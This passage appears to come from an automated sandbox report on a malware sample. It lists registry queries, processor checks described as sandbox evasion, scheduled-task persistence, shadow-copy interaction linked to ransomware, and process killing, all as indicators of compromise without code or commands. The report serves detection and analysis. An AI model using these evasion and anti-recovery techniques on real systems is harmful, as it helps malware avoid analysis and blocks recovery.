\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Service DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI RTa9h1GEw8MZAkMnDG_Wd_nd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI RTa9h1GEw8MZAkMnDG_Wd_nd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet RUNDLL32.EXE Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier RUNDLL32.EXE Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor RUNDLL32.EXE Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor RUNDLL32.EXE Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier RUNDLL32.EXE Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString RUNDLL32.EXE Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier RUNDLL32.EXE Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier RUNDLL32.EXE Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz RUNDLL32.EXE -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1344 schtasks.exe 7832 schtasks.exe 9116 schtasks.exe 1992 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 9244 vssadmin.exe -
Kills process with taskkill 8 IoCs
pid Process 5556 taskkill.exe 1040 taskkill.exe 8992 taskkill.exe 7528 taskkill.exe 8796 taskkill.exe 9780 taskkill.exe 5828 taskkill.exe 5924 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2842 = "Saratov Standard Time" mask_svc.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time" mask_svc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-462 = "Afghanistan Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-401 = "Arabic Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-691 = "Tasmania Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2341 = "Haiti Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-622 = "Korea Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-912 = "Mauritius Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1971 = "Belarus Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1932 = "Russia TZ 11 Standard Time" mask_svc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-231 = "Hawaiian Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-384 = "Namibia Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-932 = "Coordinated Universal Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-572 = "China Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-302 = "Romance Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2392 = "Aleutian Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2531 = "Chatham Islands Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-381 = "South Africa Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2141 = "Transbaikal Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-452 = "Caucasus Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-51 = "Greenland Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-232 = "Hawaiian Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-32 = "Mid-Atlantic Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2322 = "Sakhalin Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2181 = "Astrakhan Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-681 = "E. Australia Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-12 = "Azores Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-191 = "Mountain Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2632 = "Norfolk Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1862 = "Russia TZ 6 Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-461 = "Afghanistan Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2631 = "Norfolk Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-532 = "Sri Lanka Standard Time" mask_svc.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGLockdown MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "268435456" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Set value (str) 